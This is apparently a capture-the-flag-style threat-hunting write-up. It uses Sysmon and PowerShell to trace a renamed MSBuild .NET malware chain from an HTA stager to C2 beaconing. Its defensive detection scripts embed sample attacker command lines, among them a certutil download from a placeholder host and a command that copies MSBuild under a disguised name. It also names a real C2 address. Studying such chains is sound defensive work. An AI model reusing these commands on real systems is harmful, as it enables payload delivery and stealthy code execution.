# Hunting .Net Malware

### Task 1. Has msbuild executed malware on the machine?

A generic hunt is to look for any process creation event where the process image contains "msbuild.exe".

To parse the logs with PowerShell and search for MSBuild, use the following command (`$_.Properties[4]` is the Image field of a Sysmon Event ID 1 record):

```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[4].Value -like "*msbuild*"} | fl
```

The output:

<figure><img src="/files/ZjfeU4bdVb9ABRyRGvez" alt=""><figcaption><p>PowerShell returns no results. Was this it?</p></figcaption></figure>


The file name alone is a weak indicator, since it is trivially defeated by renaming the binary. Better options include the file hash and the PE version metadata Sysmon records with every process creation. Observing MSBuild on a regular Windows 10 machine, we notice that the "Description" field is set to "MSBuild.exe". Let's use PowerShell to look for that in our data set (`$_.Properties[6]` is the Description field of a Sysmon Event ID 1 record; the OriginalFileName field at `$_.Properties[9]` comes from the same version resource and is worth checking alongside it):

```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[6].Value -like "*msbuild*"} | fl
```

<figure><img src="/files/X5RD5s3BuKqawV7ZluMe" alt=""><figcaption></figcaption></figure>

Note that the binary image is "C:\Users\Public\Downloads\Windows\_Reporting.exe", and that it was started with the command line argument "Windows\_Reporting.xml".

### Task 2. What was the initial stager?

Next, search for process creation events where the image is cmd.exe (again `$_.Properties[4]` is the Image field of a Sysmon Event ID 1 record), this time paying attention to the ParentImage and ParentCommandLine fields of the matches (`$_.Properties[20]` and `$_.Properties[21]` in Sysmon v10 and later):

```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[4].Value -like "*Cmd*"} | fl
```


<figure><img src="/files/euNjmHY8yblz1HVPhrR5" alt=""><figcaption></figcaption></figure>

The parent image is "mshta.exe", which executed "report.hta". Since the HTA sat in a temporary location used by Microsoft Edge, we can conclude that it was opened from the browser; the cmd.exe it spawned is what started Windows\_Reporting.exe.

The initial stager is therefore an HTA file. We still do not know how or why MSBuild was renamed to Windows\_Reporting.exe and placed in such an odd location.
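The two searches above can be folded into one hunt. The following PowerShell is an added example, not code from the original write-up: it projects Sysmon Event ID 1 records into flat objects, flags any process whose Description or OriginalFileName says MSBuild while its file name or directory does not, and then walks the ProcessGuid/ParentProcessGuid chain of each hit to recover the mshta.exe -> cmd.exe -> Windows\_Reporting.exe ancestry without a second manual query. The field indices are assumptions that hold for Sysmon v10 and later (RuleName at index 0); the `$sample` events and the paths in them are constructed for the example, not taken from the incident.

```powershell
# Added example, not code from the original write-up. It does two things the write-up does by hand:
# (1) flags MSBuild by the PE metadata Sysmon records (Description / OriginalFileName) rather than by
#     file name, so a renamed copy in an odd directory still surfaces, and
# (2) walks the parent chain of each hit using ProcessGuid / ParentProcessGuid.
# Assumed Sysmon (v10+) Event ID 1 field order: 1 UtcTime, 2 ProcessGuid, 4 Image, 6 Description,
# 9 OriginalFileName, 10 CommandLine, 18 ParentProcessGuid, 20 ParentImage, 21 ParentCommandLine.

function Get-SysmonProcessCreate {
    # Projects raw ID 1 events into flat objects; everything below works on these, not on raw events.
    param([string]$LogName = 'Microsoft-Windows-Sysmon/Operational')
    Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 1 } | ForEach-Object {
        $p = $_.Properties
        [pscustomobject]@{
            UtcTime = $p[1].Value; ProcessGuid = $p[2].Value; Image = $p[4].Value
            Description = $p[6].Value; OriginalFileName = $p[9].Value; CommandLine = $p[10].Value
            ParentProcessGuid = $p[18].Value; ParentImage = $p[20].Value; ParentCommandLine = $p[21].Value
        }
    }
}

function Find-RenamedMSBuild {
    # Returns processes whose metadata says MSBuild but whose name or location does not look like it.
    param([Parameter(Mandatory)] [object[]]$Events)
    foreach ($e in $Events) {
        $isMSBuild = ($e.Description -like '*MSBuild*') -or ($e.OriginalFileName -eq 'MSBuild.exe')
        if (-not $isMSBuild) { continue }
        $leaf    = ($e.Image -split '[\\/]')[-1]
        $reasons = @()
        if ($leaf -ne 'MSBuild.exe') { $reasons += "renamed to $leaf" }
        # MSBuild normally lives under the .NET Framework or Visual Studio MSBuild directories.
        if ($e.Image -notmatch '\\Microsoft\.NET\\Framework(64)?\\|\\MSBuild\\') { $reasons += 'unexpected path' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ ProcessGuid = $e.ProcessGuid; Image = $e.Image
                               CommandLine = $e.CommandLine; Reason = ($reasons -join '; ') }
        }
    }
}

function Get-ProcessAncestry {
    # Walks from a ProcessGuid up to the root (or $MaxDepth), child first. When the parent's own ID 1 event
    # is missing (it predates the log, or was filtered out), the parent fields copied onto the child are used.
    param([Parameter(Mandatory)] [object[]]$Events,
          [Parameter(Mandatory)] [string]$ProcessGuid,
          [int]$MaxDepth = 10)
    $byGuid = @{}
    foreach ($e in $Events) { $byGuid[$e.ProcessGuid] = $e }
    $chain = @()
    $cur = $byGuid[$ProcessGuid]
    while ($cur -and $chain.Count -lt $MaxDepth) {
        $chain += [pscustomobject]@{ Depth = $chain.Count; Image = $cur.Image; CommandLine = $cur.CommandLine }
        $next = if ($cur.ParentProcessGuid) { $byGuid[$cur.ParentProcessGuid] } else { $null }
        if (-not $next -and $cur.ParentImage) {
            $chain += [pscustomobject]@{ Depth = $chain.Count; Image = $cur.ParentImage; CommandLine = $cur.ParentCommandLine }
        }
        $cur = $next
    }
    $chain
}

# Constructed sample (not real log data) shaped like the projection above; it mirrors the chain the
# write-up recovered: browser -> mshta.exe (report.hta) -> cmd.exe -> renamed MSBuild. Paths are placeholders.
$sample = @(
    [pscustomobject]@{ UtcTime = '2023-01-01 10:00:01.000'; ProcessGuid = '{G1}'; Image = 'C:\Windows\System32\mshta.exe'
        Description = 'Microsoft (R) HTML Application host'; OriginalFileName = 'MSHTA.EXE'
        CommandLine = '"C:\Windows\System32\mshta.exe" "C:\Users\user\AppData\Local\Temp\report.hta"'
        ParentProcessGuid = '{G0}'; ParentImage = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'; ParentCommandLine = 'msedge.exe' }
    [pscustomobject]@{ UtcTime = '2023-01-01 10:00:02.000'; ProcessGuid = '{G2}'; Image = 'C:\Windows\System32\cmd.exe'
        Description = 'Windows Command Processor'; OriginalFileName = 'Cmd.Exe'
        CommandLine = 'cmd.exe /c copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\Public\Downloads\Windows_Reporting.exe'
        ParentProcessGuid = '{G1}'; ParentImage = 'C:\Windows\System32\mshta.exe'; ParentCommandLine = 'mshta.exe' }
    [pscustomobject]@{ UtcTime = '2023-01-01 10:00:03.000'; ProcessGuid = '{G3}'; Image = 'C:\Users\Public\Downloads\Windows_Reporting.exe'
        Description = 'MSBuild.exe'; OriginalFileName = 'MSBuild.exe'
        CommandLine = 'C:\Users\Public\Downloads\Windows_Reporting.exe Windows_Reporting.xml'
        ParentProcessGuid = '{G2}'; ParentImage = 'C:\Windows\System32\cmd.exe'; ParentCommandLine = 'cmd.exe' }
)

$hits = @(Find-RenamedMSBuild -Events $sample)
$hits | Format-Table -AutoSize
foreach ($h in $hits) { Get-ProcessAncestry -Events $sample -ProcessGuid $h.ProcessGuid | Format-Table -AutoSize }
# On a live host, replace $sample with the real log: $live = Get-SysmonProcessCreate; Find-RenamedMSBuild -Events $live
```

On the sample, the only hit is Windows\_Reporting.exe (reason: "renamed to Windows_Reporting.exe; unexpected path"), and its ancestry comes back as Windows\_Reporting.exe, cmd.exe, mshta.exe and finally msedge.exe, the last one taken from the ParentImage field on mshta's own record because the browser's process creation is not in the sample.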

### Task 3. How was the malware downloaded? Why did the attacker choose this method?

We know that MSBuild is present in an odd location under a different name, and that an HTA file was used to execute it. Since we know the file is called "Windows\_Reporting.exe", let's look at all process creation events whose command line references it (`$_.Properties[10]` is the CommandLine field of a Sysmon Event ID 1 record):


```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[10].Value -like "*Windows_Reporting.exe*"} | fl
```


<figure><img src="/files/LSWxSvWOT9vxU0UJrBGg" alt=""><figcaption><p>The event shows the same HTA file copying MSBuild to C:\Users\Public\Downloads\Windows_Reporting.exe.</p></figcaption></figure>

From the first task we know that Windows\_Reporting.exe was executed with the command line argument "Windows\_Reporting.xml". To find out how that XML file was created, we look at Sysmon Event ID 11 (FileCreate). Execute the following command (`$_.Properties[5]` is the TargetFilename field of a Sysmon Event ID 11 record):


```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=11} | Where-Object {$_.Properties[5].Value -like "*Windows_Reporting.xml*"} | fl
```


<figure><img src="/files/DqXnELbk9uaDeSxytHES" alt=""><figcaption><p>The file was created by "certutil.exe".</p></figcaption></figure>

Let's review what MITRE ATT&CK has on certutil [here](https://attack.mitre.org/software/S0160/). It states that "certutil can be used to download files from a given URL". Following that lead, we can dig up process creation events for certutil.exe with the following command:

```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=1} | Where-Object {$_.Properties[4].Value -like "*certutil.exe*"} | fl
```


<figure><img src="/files/68fVkA69KnOyqURFmR1E" alt=""><figcaption><p>certutil.exe was used to download the XML file from <a href="http://52.77.211.51:8443/">http://52.77.211.51:8443</a>.</p></figcaption></figure>
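Instead of running the Event ID 11 and Event ID 1 searches separately and then matching on the certutil image name, the file-create event can be joined to its creating process on ProcessGuid, so the command line (and the URL inside it) is the one that actually wrote the file and not any other certutil.exe run on the host. The following PowerShell is an added example, not code from the original write-up. The `$fileEvents` and `$procEvents` objects, the placeholder host 198.51.100.10 and the paths are constructed for the example, and the field indices assume Sysmon v10 or later.

```powershell
# Added example, not code from the original write-up. It joins a Sysmon ID 11 (FileCreate) record to the
# ID 1 (ProcessCreate) record of the process that wrote the file, using ProcessGuid, and extracts the
# download URL from that process's command line.
# Assumed Sysmon (v10+) field order: ID 11 -> 1 UtcTime, 2 ProcessGuid, 4 Image, 5 TargetFilename;
# ID 1 -> 2 ProcessGuid, 10 CommandLine, 20 ParentImage.

function Get-FileCreatorCommandLine {
    param(
        [Parameter(Mandatory)] [string]$TargetPattern,   # wildcard on TargetFilename, e.g. '*Windows_Reporting.xml'
        [object[]]$FileEvents = $null,                   # projected ID 11 objects; $null reads the live log
        [object[]]$ProcEvents = $null,                   # projected ID 1 objects; $null reads the live log
        [string]$LogName = 'Microsoft-Windows-Sysmon/Operational'
    )
    if (-not $FileEvents) {
        $FileEvents = Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 11 } | ForEach-Object {
            $p = $_.Properties
            [pscustomobject]@{ UtcTime = $p[1].Value; ProcessGuid = $p[2].Value; Image = $p[4].Value; TargetFilename = $p[5].Value }
        }
    }
    if (-not $ProcEvents) {
        $ProcEvents = Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 1 } | ForEach-Object {
            $p = $_.Properties
            [pscustomobject]@{ ProcessGuid = $p[2].Value; CommandLine = $p[10].Value; ParentImage = $p[20].Value }
        }
    }
    $procByGuid = @{}
    foreach ($e in $ProcEvents) { $procByGuid[$e.ProcessGuid] = $e }

    foreach ($f in ($FileEvents | Where-Object { $_.TargetFilename -like $TargetPattern })) {
        $proc = $procByGuid[$f.ProcessGuid]
        $cmd    = if ($proc) { $proc.CommandLine } else { '<no matching ID 1 event: process predates the log or was filtered>' }
        $parent = if ($proc) { $proc.ParentImage } else { $null }
        # certutil's download form is "-urlcache -split -f <url> <outfile>"; pull the first URL out of the
        # command line so the staging host becomes an explicit column instead of something read off a screenshot.
        $url = if ($proc -and $proc.CommandLine -match '(?i)https?://[^\s"'']+') { $Matches[0] } else { $null }
        [pscustomobject]@{
            UtcTime        = $f.UtcTime
            TargetFilename = $f.TargetFilename
            Image          = $f.Image
            CommandLine    = $cmd
            ParentImage    = $parent
            DownloadUrl    = $url
        }
    }
}

# Constructed sample (not real log data): a certutil download that writes the XML MSBuild later consumes,
# plus a benign certutil invocation that an image-name search would also have returned.
# The host and paths are placeholders, not the values from the incident.
$fileEvents = @(
    [pscustomobject]@{ UtcTime = '2023-01-01 10:00:02.500'; ProcessGuid = '{G4}'; Image = 'C:\Windows\System32\certutil.exe'
                       TargetFilename = 'C:\Users\Public\Downloads\Windows_Reporting.xml' }
)
$procEvents = @(
    [pscustomobject]@{ ProcessGuid = '{G4}'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'certutil.exe -urlcache -split -f http://198.51.100.10:8443/Windows_Reporting.xml C:\Users\Public\Downloads\Windows_Reporting.xml' }
    [pscustomobject]@{ ProcessGuid = '{G5}'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'certutil.exe -hashfile C:\Users\user\Downloads\setup.msi SHA256' }
)

Get-FileCreatorCommandLine -TargetPattern '*Windows_Reporting.xml' -FileEvents $fileEvents -ProcEvents $procEvents | Format-List
# Live host: Get-FileCreatorCommandLine -TargetPattern '*Windows_Reporting.xml'
```

On the sample this returns a single record tied to `{G4}` with the `-urlcache -split -f` command line, the parent cmd.exe and `http://198.51.100.10:8443/Windows_Reporting.xml` in DownloadUrl; the `-hashfile` invocation never appears because no file-create event points at its ProcessGuid. Sysmon only logs Event ID 11 for files its configuration includes, so if the XML does not show up at all, check the FileCreate rules before concluding it was never written.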

### Task 4. What was the attacker's IP and Port?

Reviewing the recovered Windows\_Reporting.xml reveals the attacker's C2 IP and port:

<figure><img src="/files/Y4AM5j2LAunQO3DjA2YO" alt=""><figcaption></figcaption></figure>

The same can be observed in the Sysmon logs, specifically Event ID 3 (NetworkConnect) filtered on Windows\_Reporting.exe with the following command (`$_.Properties[4]` is again the Image field):

```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=3} | Where-Object {$_.Properties[4].Value -like "*Windows_Reporting.exe*"} | fl
```

<figure><img src="/files/j2v6Z4sQPJrJUhwjPV9X" alt=""><figcaption></figcaption></figure>

To count the connections, pipe the filtered events straight into Measure-Object (piping them through `fl` first would count the formatting records rather than the events):

```
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=3} | Where-Object {$_.Properties[4].Value -like "*Windows_Reporting.exe*"} | Measure-Object
```

Overall, there are 51 connections.


<figure><img src="/files/Y1DvNfVpJpps1cnYbweB" alt=""><figcaption></figcaption></figure>
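A bare count of 51 says little about the shape of the traffic. The following PowerShell is an added example, not code from the original write-up: it groups the Event ID 3 records for the image by destination IP and port and reports the count, first and last time seen and the median interval between connections, which is the quickest way to tell periodic beaconing to one ip:port from a burst of unrelated connections. The field indices assume Sysmon v10 or later; the sample events and the addresses in them are constructed placeholders, not the incident's C2.

```powershell
# Added example, not code from the original write-up. It turns the raw Event ID 3 list for one image into
# one row per destination with count, first/last seen and the median gap between connections.
# Assumed Sysmon (v10+) Event ID 3 field order: 1 UtcTime, 4 Image, 14 DestinationIp, 16 DestinationPort.

function Get-NetworkConnectSummary {
    param(
        [Parameter(Mandatory)] [string]$ImagePattern,   # wildcard on Image, e.g. '*Windows_Reporting.exe'
        [object[]]$Events = $null,                      # projected ID 3 objects; $null reads the live log
        [string]$LogName = 'Microsoft-Windows-Sysmon/Operational'
    )
    if (-not $Events) {
        $Events = Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 3 } | ForEach-Object {
            $p = $_.Properties
            [pscustomobject]@{ UtcTime = $p[1].Value; Image = $p[4].Value
                               DestinationIp = $p[14].Value; DestinationPort = $p[16].Value }
        }
    }
    $Events | Where-Object { $_.Image -like $ImagePattern } |
        Group-Object DestinationIp, DestinationPort | ForEach-Object {
            # Sysmon stores UtcTime as 'yyyy-MM-dd HH:mm:ss.fff'; parse with the invariant culture so ordering is right.
            $times = @($_.Group | ForEach-Object {
                [datetime]::ParseExact($_.UtcTime, 'yyyy-MM-dd HH:mm:ss.fff', [Globalization.CultureInfo]::InvariantCulture)
            } | Sort-Object)
            $gaps = @(for ($i = 1; $i -lt $times.Count; $i++) { ($times[$i] - $times[$i - 1]).TotalSeconds })
            # Median rather than mean so a single long pause (host asleep, C2 down) does not mask a regular beacon.
            $median = if ($gaps.Count -gt 0) { @($gaps | Sort-Object)[$gaps.Count -shr 1] } else { $null }
            [pscustomobject]@{
                Destination       = $_.Name          # "ip, port"
                Connections       = $_.Count
                FirstSeenUtc      = $times[0]
                LastSeenUtc       = $times[-1]
                MedianIntervalSec = $median
            }
        }
}

# Constructed sample (not real log data): five connections 60 s apart to one placeholder host, plus one
# unrelated connection. Addresses are documentation ranges, not the C2 from the incident.
$sample = @(
    foreach ($m in 0..4) {
        [pscustomobject]@{ UtcTime = ('2023-01-01 10:{0:d2}:00.000' -f $m); Image = 'C:\Users\Public\Downloads\Windows_Reporting.exe'
                           DestinationIp = '198.51.100.10'; DestinationPort = 8443 }
    }
    [pscustomobject]@{ UtcTime = '2023-01-01 10:02:30.000'; Image = 'C:\Users\Public\Downloads\Windows_Reporting.exe'
                       DestinationIp = '203.0.113.5'; DestinationPort = 443 }
)

Get-NetworkConnectSummary -ImagePattern '*Windows_Reporting.exe' -Events $sample | Format-Table -AutoSize
# Live host: Get-NetworkConnectSummary -ImagePattern '*Windows_Reporting.exe'
```

On the sample this yields two rows: "198.51.100.10, 8443" with 5 connections and a median interval of 60 seconds, and "203.0.113.5, 443" with a single connection and no interval. Against the real log, a destination whose row shows most of the 51 connections at a steady interval is the C2; the XML's contents and this summary should point at the same address and port.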
